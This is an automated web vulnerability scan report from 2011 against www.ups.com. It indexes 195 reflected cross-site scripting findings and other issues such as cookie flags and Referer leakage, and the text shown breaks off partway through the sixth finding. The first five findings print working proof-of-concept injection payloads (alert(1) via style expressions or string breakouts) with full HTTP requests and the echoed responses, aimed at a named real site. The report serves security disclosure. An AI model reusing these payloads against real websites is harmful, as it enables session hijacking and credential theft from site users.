XSS, Cross Site Scripting, CWE-79, www.ups.com

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by CloudScan Vulnerability Crawler at Sun Feb 13 19:32:58 CST 2011.


The DORK Report

Loading

1. Cross-site scripting (reflected)

1.1. http://www.ups.com/bussol [WT.svl parameter]

1.2. http://www.ups.com/bussol [actionID parameter]

1.3. http://www.ups.com/bussol [actionID parameter]

1.4. http://www.ups.com/bussol [contentID parameter]

1.5. http://www.ups.com/bussol [contentID parameter]

1.6. http://www.ups.com/bussol [loc parameter]

1.7. http://www.ups.com/bussol [loc parameter]

1.8. http://www.ups.com/bussol [name of an arbitrarily supplied request parameter]

1.9. http://www.ups.com/bussol [name of an arbitrarily supplied request parameter]

1.10. http://www.ups.com/bussol [viewID parameter]

1.11. http://www.ups.com/bussol [viewID parameter]

1.12. http://www.ups.com/bussol/ [WT.svl parameter]

1.13. http://www.ups.com/bussol/ [loc parameter]

1.14. http://www.ups.com/bussol/ [loc parameter]

1.15. http://www.ups.com/bussol/ [name of an arbitrarily supplied request parameter]

1.16. http://www.ups.com/bussol/ [name of an arbitrarily supplied request parameter]

1.17. http://www.ups.com/bussol/ [viewID parameter]

1.18. http://www.ups.com/bussol/ [viewID parameter]

1.19. http://www.ups.com/content/global/index.jsx [REST URL parameter 2]

1.20. http://www.ups.com/content/us/en/about/index.html [REST URL parameter 2]

1.21. http://www.ups.com/content/us/en/about/index.html [REST URL parameter 3]

1.22. http://www.ups.com/content/us/en/about/news/service_updates/20091007_batteries.html [REST URL parameter 2]

1.23. http://www.ups.com/content/us/en/about/news/service_updates/20091007_batteries.html [REST URL parameter 3]

1.24. http://www.ups.com/content/us/en/about/news/service_updates/20100120_on_call.html [REST URL parameter 2]

1.25. http://www.ups.com/content/us/en/about/news/service_updates/20100120_on_call.html [REST URL parameter 3]

1.26. http://www.ups.com/content/us/en/about/news/service_updates/20100624_fraud.html [REST URL parameter 2]

1.27. http://www.ups.com/content/us/en/about/news/service_updates/20100624_fraud.html [REST URL parameter 3]

1.28. http://www.ups.com/content/us/en/about/news/service_updates/20101102_investigation.html [REST URL parameter 2]

1.29. http://www.ups.com/content/us/en/about/news/service_updates/20101102_investigation.html [REST URL parameter 3]

1.30. http://www.ups.com/content/us/en/about/news/service_updates/20101102_toner.html [REST URL parameter 2]

1.31. http://www.ups.com/content/us/en/about/news/service_updates/20101102_toner.html [REST URL parameter 3]

1.32. http://www.ups.com/content/us/en/about/news/service_updates/20101217_imp_cntrl.html [REST URL parameter 2]

1.33. http://www.ups.com/content/us/en/about/news/service_updates/20101217_imp_cntrl.html [REST URL parameter 3]

1.34. http://www.ups.com/content/us/en/about/news/service_updates/retail_requirement.html [REST URL parameter 2]

1.35. http://www.ups.com/content/us/en/about/news/service_updates/retail_requirement.html [REST URL parameter 3]

1.36. http://www.ups.com/content/us/en/about/sites.html [REST URL parameter 2]

1.37. http://www.ups.com/content/us/en/about/sites.html [REST URL parameter 3]

1.38. http://www.ups.com/content/us/en/contact/index.html [REST URL parameter 2]

1.39. http://www.ups.com/content/us/en/contact/index.html [REST URL parameter 3]

1.40. http://www.ups.com/content/us/en/freight/air_freight.html [REST URL parameter 2]

1.41. http://www.ups.com/content/us/en/freight/air_freight.html [REST URL parameter 3]

1.42. http://www.ups.com/content/us/en/freight/customsbrokerage.html [REST URL parameter 2]

1.43. http://www.ups.com/content/us/en/freight/customsbrokerage.html [REST URL parameter 3]

1.44. http://www.ups.com/content/us/en/freight/expedite.html [REST URL parameter 2]

1.45. http://www.ups.com/content/us/en/freight/expedite.html [REST URL parameter 3]

1.46. http://www.ups.com/content/us/en/freight/index.html [REST URL parameter 2]

1.47. http://www.ups.com/content/us/en/freight/index.html [REST URL parameter 3]

1.48. http://www.ups.com/content/us/en/freight/ocean_freight.html [REST URL parameter 2]

1.49. http://www.ups.com/content/us/en/freight/ocean_freight.html [REST URL parameter 3]

1.50. http://www.ups.com/content/us/en/freight/road_freight.html [REST URL parameter 2]

1.51. http://www.ups.com/content/us/en/freight/road_freight.html [REST URL parameter 3]

1.52. http://www.ups.com/content/us/en/index.jsx [REST URL parameter 2]

1.53. http://www.ups.com/content/us/en/index.jsx [REST URL parameter 3]

1.54. http://www.ups.com/content/us/en/locations/alliances/index.html [REST URL parameter 2]

1.55. http://www.ups.com/content/us/en/locations/alliances/index.html [REST URL parameter 3]

1.56. http://www.ups.com/content/us/en/locations/aso/index.html [REST URL parameter 2]

1.57. http://www.ups.com/content/us/en/locations/aso/index.html [REST URL parameter 3]

1.58. http://www.ups.com/content/us/en/locations/custcenters/index.html [REST URL parameter 2]

1.59. http://www.ups.com/content/us/en/locations/custcenters/index.html [REST URL parameter 3]

1.60. http://www.ups.com/content/us/en/locations/dropboxes/index.html [REST URL parameter 2]

1.61. http://www.ups.com/content/us/en/locations/dropboxes/index.html [REST URL parameter 3]

1.62. http://www.ups.com/content/us/en/locations/store/index.html [REST URL parameter 2]

1.63. http://www.ups.com/content/us/en/locations/store/index.html [REST URL parameter 3]

1.64. http://www.ups.com/content/us/en/myups/billing/index.html [REST URL parameter 2]

1.65. http://www.ups.com/content/us/en/myups/billing/index.html [REST URL parameter 3]

1.66. http://www.ups.com/content/us/en/myups/mgmt/index.html [REST URL parameter 2]

1.67. http://www.ups.com/content/us/en/myups/mgmt/index.html [REST URL parameter 3]

1.68. http://www.ups.com/content/us/en/register/help/index.html [REST URL parameter 2]

1.69. http://www.ups.com/content/us/en/register/help/index.html [REST URL parameter 3]

1.70. http://www.ups.com/content/us/en/register/reasons/index.html [REST URL parameter 2]

1.71. http://www.ups.com/content/us/en/register/reasons/index.html [REST URL parameter 3]

1.72. http://www.ups.com/content/us/en/resources/index.html [REST URL parameter 2]

1.73. http://www.ups.com/content/us/en/resources/index.html [REST URL parameter 3]

1.74. http://www.ups.com/content/us/en/resources/pay/index.html [REST URL parameter 2]

1.75. http://www.ups.com/content/us/en/resources/pay/index.html [REST URL parameter 3]

1.76. http://www.ups.com/content/us/en/resources/service/delivery_change.html [REST URL parameter 2]

1.77. http://www.ups.com/content/us/en/resources/service/delivery_change.html [REST URL parameter 3]

1.78. http://www.ups.com/content/us/en/resources/service/index.html [REST URL parameter 2]

1.79. http://www.ups.com/content/us/en/resources/service/index.html [REST URL parameter 3]

1.80. http://www.ups.com/content/us/en/resources/ship/fraud.html [REST URL parameter 2]

1.81. http://www.ups.com/content/us/en/resources/ship/fraud.html [REST URL parameter 3]

1.82. http://www.ups.com/content/us/en/resources/ship/index.html [REST URL parameter 2]

1.83. http://www.ups.com/content/us/en/resources/ship/index.html [REST URL parameter 3]

1.84. http://www.ups.com/content/us/en/resources/ship/terms/privacy.html [REST URL parameter 2]

1.85. http://www.ups.com/content/us/en/resources/ship/terms/privacy.html [REST URL parameter 3]

1.86. http://www.ups.com/content/us/en/resources/ship/terms/shipping/index.html [REST URL parameter 2]

1.87. http://www.ups.com/content/us/en/resources/ship/terms/shipping/index.html [REST URL parameter 3]

1.88. http://www.ups.com/content/us/en/resources/ship/terms/use.html [REST URL parameter 2]

1.89. http://www.ups.com/content/us/en/resources/ship/terms/use.html [REST URL parameter 3]

1.90. http://www.ups.com/content/us/en/resources/start/index.html [REST URL parameter 2]

1.91. http://www.ups.com/content/us/en/resources/start/index.html [REST URL parameter 3]

1.92. http://www.ups.com/content/us/en/resources/techsupport/index.html [REST URL parameter 2]

1.93. http://www.ups.com/content/us/en/resources/techsupport/index.html [REST URL parameter 3]

1.94. http://www.ups.com/content/us/en/resources/track/index.html [REST URL parameter 2]

1.95. http://www.ups.com/content/us/en/resources/track/index.html [REST URL parameter 3]

1.96. http://www.ups.com/content/us/en/shipping/index.html [REST URL parameter 2]

1.97. http://www.ups.com/content/us/en/shipping/index.html [REST URL parameter 3]

1.98. http://www.ups.com/content/us/en/shipping/time/service/index.html [REST URL parameter 2]

1.99. http://www.ups.com/content/us/en/shipping/time/service/index.html [REST URL parameter 3]

1.100. http://www.ups.com/content/us/en/shipping/time/service/shipping/index.html [REST URL parameter 2]

1.101. http://www.ups.com/content/us/en/shipping/time/service/shipping/index.html [REST URL parameter 3]

1.102. http://www.ups.com/content/us/en/siteguide/index.html [REST URL parameter 2]

1.103. http://www.ups.com/content/us/en/siteguide/index.html [REST URL parameter 3]

1.104. http://www.ups.com/content/us/en/tracking/fgv/index.html [REST URL parameter 2]

1.105. http://www.ups.com/content/us/en/tracking/fgv/index.html [REST URL parameter 3]

1.106. http://www.ups.com/content/us/en/tracking/quantumview/index.html [REST URL parameter 2]

1.107. http://www.ups.com/content/us/en/tracking/quantumview/index.html [REST URL parameter 3]

1.108. http://www.ups.com/content/us/en/tracking/tools/index.html [REST URL parameter 2]

1.109. http://www.ups.com/content/us/en/tracking/tools/index.html [REST URL parameter 3]

1.110. http://www.ups.com/dropoff [WT.svl parameter]

1.111. http://www.ups.com/dropoff [loc parameter]

1.112. http://www.ups.com/dropoff [name of an arbitrarily supplied request parameter]

1.113. https://www.ups.com/account/am/start [REST URL parameter 2]

1.114. https://www.ups.com/account/am/start [REST URL parameter 2]

1.115. https://www.ups.com/account/am/start [REST URL parameter 2]

1.116. https://www.ups.com/account/am/start [REST URL parameter 3]

1.117. https://www.ups.com/account/am/start [REST URL parameter 3]

1.118. https://www.ups.com/account/am/start [REST URL parameter 3]

1.119. https://www.ups.com/account/am/start [loc parameter]

1.120. https://www.ups.com/account/am/start [loc parameter]

1.121. https://www.ups.com/account/am/start [loc parameter]

1.122. https://www.ups.com/account/us/start [REST URL parameter 2]

1.123. https://www.ups.com/account/us/start [REST URL parameter 2]

1.124. https://www.ups.com/account/us/start [REST URL parameter 2]

1.125. https://www.ups.com/account/us/start [REST URL parameter 3]

1.126. https://www.ups.com/account/us/start [REST URL parameter 3]

1.127. https://www.ups.com/account/us/start [REST URL parameter 3]

1.128. https://www.ups.com/account/us/start [loc parameter]

1.129. https://www.ups.com/account/us/start [loc parameter]

1.130. https://www.ups.com/account/us/start [loc parameter]

1.131. https://www.ups.com/cva [REST URL parameter 1]

1.132. https://www.ups.com/cva [REST URL parameter 1]

1.133. https://www.ups.com/cva [REST URL parameter 1]

1.134. https://www.ups.com/cva [loc parameter]

1.135. https://www.ups.com/cva [loc parameter]

1.136. https://www.ups.com/cva [loc parameter]

1.137. https://www.ups.com/myWorkspace/home [REST URL parameter 2]

1.138. https://www.ups.com/myWorkspace/home [REST URL parameter 2]

1.139. https://www.ups.com/myWorkspace/home [REST URL parameter 2]

1.140. https://www.ups.com/myWorkspace/home [loc parameter]

1.141. https://www.ups.com/myWorkspace/home [loc parameter]

1.142. https://www.ups.com/myWorkspace/home [loc parameter]

1.143. https://www.ups.com/myWorkspace/wspref [REST URL parameter 2]

1.144. https://www.ups.com/myWorkspace/wspref [REST URL parameter 2]

1.145. https://www.ups.com/myWorkspace/wspref [REST URL parameter 2]

1.146. https://www.ups.com/myWorkspace/wspref [loc parameter]

1.147. https://www.ups.com/myWorkspace/wspref [loc parameter]

1.148. https://www.ups.com/myWorkspace/wspref [loc parameter]

1.149. https://www.ups.com/myups/addresses [REST URL parameter 2]

1.150. https://www.ups.com/myups/addresses [REST URL parameter 2]

1.151. https://www.ups.com/myups/addresses [REST URL parameter 2]

1.152. https://www.ups.com/myups/addresses [loc parameter]

1.153. https://www.ups.com/myups/addresses [loc parameter]

1.154. https://www.ups.com/myups/addresses [loc parameter]

1.155. https://www.ups.com/myups/forgotpassword [loc parameter]

1.156. https://www.ups.com/one-to-one/forgot [loc parameter]

1.157. https://www.ups.com/one-to-one/register [loc parameter]

1.158. https://www.ups.com/osa/orderSupplies [REST URL parameter 1]

1.159. https://www.ups.com/osa/orderSupplies [REST URL parameter 1]

1.160. https://www.ups.com/osa/orderSupplies [REST URL parameter 1]

1.161. https://www.ups.com/osa/orderSupplies [REST URL parameter 2]

1.162. https://www.ups.com/osa/orderSupplies [REST URL parameter 2]

1.163. https://www.ups.com/osa/orderSupplies [REST URL parameter 2]

1.164. https://www.ups.com/osa/orderSupplies [loc parameter]

1.165. https://www.ups.com/osa/orderSupplies [loc parameter]

1.166. https://www.ups.com/osa/orderSupplies [loc parameter]

1.167. https://www.ups.com/quantum_services/download [loc parameter]

1.168. https://www.ups.com/quantum_services/download [loc parameter]

1.169. https://www.ups.com/quantum_services/download [loc parameter]

1.170. https://www.ups.com/qvadmin/admin [REST URL parameter 1]

1.171. https://www.ups.com/qvadmin/admin [REST URL parameter 1]

1.172. https://www.ups.com/qvadmin/admin [REST URL parameter 1]

1.173. https://www.ups.com/qvadmin/admin [REST URL parameter 2]

1.174. https://www.ups.com/qvadmin/admin [REST URL parameter 2]

1.175. https://www.ups.com/qvadmin/admin [REST URL parameter 2]

1.176. https://www.ups.com/qvadmin/admin [loc parameter]

1.177. https://www.ups.com/qvadmin/admin [loc parameter]

1.178. https://www.ups.com/qvadmin/admin [loc parameter]

1.179. https://www.ups.com/sharp/prefapp [REST URL parameter 2]

1.180. https://www.ups.com/sharp/prefapp [REST URL parameter 2]

1.181. https://www.ups.com/sharp/prefapp [REST URL parameter 2]

1.182. https://www.ups.com/sharp/prefapp [loc parameter]

1.183. https://www.ups.com/sharp/prefapp [loc parameter]

1.184. https://www.ups.com/sharp/prefapp [loc parameter]

1.185. https://www.ups.com/uis/create [REST URL parameter 1]

1.186. https://www.ups.com/uis/create [REST URL parameter 1]

1.187. https://www.ups.com/uis/create [REST URL parameter 1]

1.188. https://www.ups.com/uis/create [REST URL parameter 2]

1.189. https://www.ups.com/uis/create [REST URL parameter 2]

1.190. https://www.ups.com/uis/create [REST URL parameter 2]

1.191. https://www.ups.com/uis/create [loc parameter]

1.192. https://www.ups.com/uis/create [loc parameter]

1.193. https://www.ups.com/uis/create [loc parameter]

1.194. http://www.ups.com/homepage/ddhandler/handler.jsp [Referer HTTP header]

1.195. https://www.ups.com/homepage/ddhandler/handler.jsp [Referer HTTP header]

2. SSL cookie without secure flag set

3. Flash cross-domain policy

3.1. http://www.ups.com/crossdomain.xml

3.2. https://www.ups.com/crossdomain.xml

4. Cookie without HttpOnly flag set

4.1. http://www.ups.com/pressroom/us/press_releases/press_release/Press+Releases/Current+Press+Releases/ci.UPS+Express+Freight+Service+Expands+into+Israel+and+Slovakia.syndication

4.2. http://www.ups.com/pressroom/us/press_releases/press_release/Press+Releases/Homepage+Press+Releases/ci.UPS+Capital+Expands+Latin+American+Network+with+New+Offices+in+Colombia+and+Peru.syndication

4.3. https://www.ups.com/upsemail/input

4.4. http://www.ups.com/

4.5. http://www.ups.com/bussol

4.6. http://www.ups.com/bussol/

4.7. http://www.ups.com/search/quick

5. Cookie scoped to parent domain

6. Cross-domain Referer leakage

6.1. http://www.ups.com/

6.2. http://www.ups.com/WebTracking/track

6.3. http://www.ups.com/bussol

6.4. http://www.ups.com/bussol/

6.5. http://www.ups.com/content/global/index.jsx

6.6. http://www.ups.com/content/us/en/about/index.html

6.7. http://www.ups.com/content/us/en/about/sites.html

6.8. http://www.ups.com/content/us/en/contact/index.html

6.9. http://www.ups.com/content/us/en/freight/air_freight.html

6.10. http://www.ups.com/content/us/en/freight/customsbrokerage.html

6.11. http://www.ups.com/content/us/en/freight/expedite.html

6.12. http://www.ups.com/content/us/en/freight/index.html

6.13. http://www.ups.com/content/us/en/freight/ocean_freight.html

6.14. http://www.ups.com/content/us/en/freight/road_freight.html

6.15. http://www.ups.com/content/us/en/index.jsx

6.16. http://www.ups.com/content/us/en/locations/alliances/index.html

6.17. http://www.ups.com/content/us/en/locations/aso/index.html

6.18. http://www.ups.com/content/us/en/locations/custcenters/index.html

6.19. http://www.ups.com/content/us/en/locations/dropboxes/index.html

6.20. http://www.ups.com/content/us/en/locations/store/index.html

6.21. http://www.ups.com/content/us/en/myups/billing/index.html

6.22. http://www.ups.com/content/us/en/myups/mgmt/index.html

6.23. http://www.ups.com/content/us/en/register/help/index.html

6.24. http://www.ups.com/content/us/en/register/reasons/index.html

6.25. http://www.ups.com/content/us/en/resources/index.html

6.26. http://www.ups.com/content/us/en/resources/pay/index.html

6.27. http://www.ups.com/content/us/en/resources/service/delivery_change.html

6.28. http://www.ups.com/content/us/en/resources/service/index.html

6.29. http://www.ups.com/content/us/en/resources/ship/fraud.html

6.30. http://www.ups.com/content/us/en/resources/ship/index.html

6.31. http://www.ups.com/content/us/en/resources/ship/terms/privacy.html

6.32. http://www.ups.com/content/us/en/resources/ship/terms/shipping/index.html

6.33. http://www.ups.com/content/us/en/resources/ship/terms/use.html

6.34. http://www.ups.com/content/us/en/resources/start/index.html

6.35. http://www.ups.com/content/us/en/resources/techsupport/index.html

6.36. http://www.ups.com/content/us/en/resources/track/index.html

6.37. http://www.ups.com/content/us/en/shipping/index.html

6.38. http://www.ups.com/content/us/en/shipping/time/service/index.html

6.39. http://www.ups.com/content/us/en/siteguide/index.html

6.40. http://www.ups.com/content/us/en/tracking/fgv/index.html

6.41. http://www.ups.com/content/us/en/tracking/quantumview/index.html

6.42. http://www.ups.com/content/us/en/tracking/tools/index.html

6.43. http://www.ups.com/dropoff

6.44. http://www.ups.com/sf

6.45. http://www.ups.com/upsmobile/

7. Email addresses disclosed

7.1. http://www.ups.com/WebTracking/track

7.2. http://www.ups.com/content/us/en/about/news/service_updates/20100624_fraud.html

7.3. http://www.ups.com/content/us/en/contact/index.html

7.4. http://www.ups.com/content/us/en/resources/ship/fraud.html

7.5. http://www.ups.com/content/us/en/resources/ship/terms/privacy.html

8. Private IP addresses disclosed

8.1. http://www.ups.com/

8.2. http://www.ups.com/content/us/en/index.jsx

9. Robots.txt file

9.1. http://www.ups.com/

9.2. https://www.ups.com/myups/registration

10. Cacheable HTTPS response

10.1. https://www.ups.com/favicon.ico

10.2. https://www.ups.com/homepage/ddhandler/handler.jsp

11. HTML uses unrecognised charset

12. SSL certificate



1. Cross-site scripting (reflected)  next
There are 195 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.ups.com/bussol [WT.svl parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The value of the WT.svl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b8d1"style%3d"x%3aexpression(alert(1))"f4e955ab522 was submitted in the WT.svl parameter. This input was echoed as 5b8d1"style="x:expression(alert(1))"f4e955ab522 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bussol?loc=en_US&WT.svl=PriNav5b8d1"style%3d"x%3aexpression(alert(1))"f4e955ab522 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:38 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=GJq1NYGSyJt6JdGvfWmChTLqL4mM8L6MNmYnGczyNNgN81gH90Bh!-874049020!-1727860139!15202!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17883


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="hidden" id="unKnown"
   value="&WT.svl=PriNav5b8d1"style="x:expression(alert(1))"f4e955ab522&loc=en_US" />
...[SNIP]...

1.2. http://www.ups.com/bussol [actionID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The value of the actionID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82a1a"style%3d"x%3aexpression(alert(1))"0a64840504b was submitted in the actionID parameter. This input was echoed as 82a1a"style="x:expression(alert(1))"0a64840504b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bussol?loc=en_US&viewID=productView&contentID=ct1_sol_sol_int_ship&actionID=videoDemo82a1a"style%3d"x%3aexpression(alert(1))"0a64840504b HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:49 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=vG56NYGdQ5B2RJl7qh78jHpwwn9S1MV1h7C7HmynpjtF7QnySHrQ!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18141


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="hidden" id="bspa_actionID"
   value="videoDemo82a1a"style="x:expression(alert(1))"0a64840504b" />
...[SNIP]...

1.3. http://www.ups.com/bussol [actionID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The value of the actionID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c518"%3balert(1)//e6dfe32ce27 was submitted in the actionID parameter. This input was echoed as 5c518";alert(1)//e6dfe32ce27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bussol?loc=en_US&viewID=productView&contentID=ct1_sol_sol_int_ship&actionID=videoDemo5c518"%3balert(1)//e6dfe32ce27 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:50 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=pfl9NYGpRJ3bMG8jFM0yWChjmFpqfrrMrWGLp4snQtvC3TqTs6nF!-874049020!-1727860139!15202!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18084


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
           "name", "bussol",
           "allowScriptAccess","sameDomain",
           "type", "application/x-shockwave-flash",
           "pluginspage", "http://www.adobe.com/go/getflashplayer",
           "FlashVars", "actionID=videoDemo5c518";alert(1)//e6dfe32ce27&bspa_xmlRoot=/xml/ria/na/us/en/bussol/&contentID=ct1_sol_sol_int_ship&hash=1297646750072&loc=en_US&v=2.0.4&viewID=productView"
   );
} else { // flash is too old or we can't detect the plugin
   docum
...[SNIP]...

1.4. http://www.ups.com/bussol [contentID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The value of the contentID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b611e"style%3d"x%3aexpression(alert(1))"ed7c494a92e was submitted in the contentID parameter. This input was echoed as b611e"style="x:expression(alert(1))"ed7c494a92e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bussol?loc=en_US&viewID=productView&contentID=ct1_sol_sol_int_shipb611e"style%3d"x%3aexpression(alert(1))"ed7c494a92e&actionID=videoDemo HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:46 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=gLGfNYGh1ll4WyP7f1Tpp4QnQqhjxhJcszfLYXrwGrTqNnnQTvK3!-874049020!-1727860139!15202!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18141


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="hidden" id="bspa_contentID"
   value="ct1_sol_sol_int_shipb611e"style="x:expression(alert(1))"ed7c494a92e" />
...[SNIP]...

1.5. http://www.ups.com/bussol [contentID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The value of the contentID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 400cb"%3balert(1)//b2edff9e689 was submitted in the contentID parameter. This input was echoed as 400cb";alert(1)//b2edff9e689 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bussol?loc=en_US&viewID=productView&contentID=ct1_sol_sol_int_ship400cb"%3balert(1)//b2edff9e689&actionID=videoDemo HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:47 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=83XvNYGb1b1Q810cT9c3B7yvfQTw2h92pNzmJzZT72QYZ4Zf74fs!-874049020!-1727860139!15202!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18084


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
"application/x-shockwave-flash",
           "pluginspage", "http://www.adobe.com/go/getflashplayer",
           "FlashVars", "actionID=videoDemo&bspa_xmlRoot=/xml/ria/na/us/en/bussol/&contentID=ct1_sol_sol_int_ship400cb";alert(1)//b2edff9e689&hash=1297646747167&loc=en_US&v=2.0.4&viewID=productView"
   );
} else { // flash is too old or we can't detect the plugin
   document.getElementById("noflashdiv").style.display = "block";
}
</script
...[SNIP]...

1.6. http://www.ups.com/bussol [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

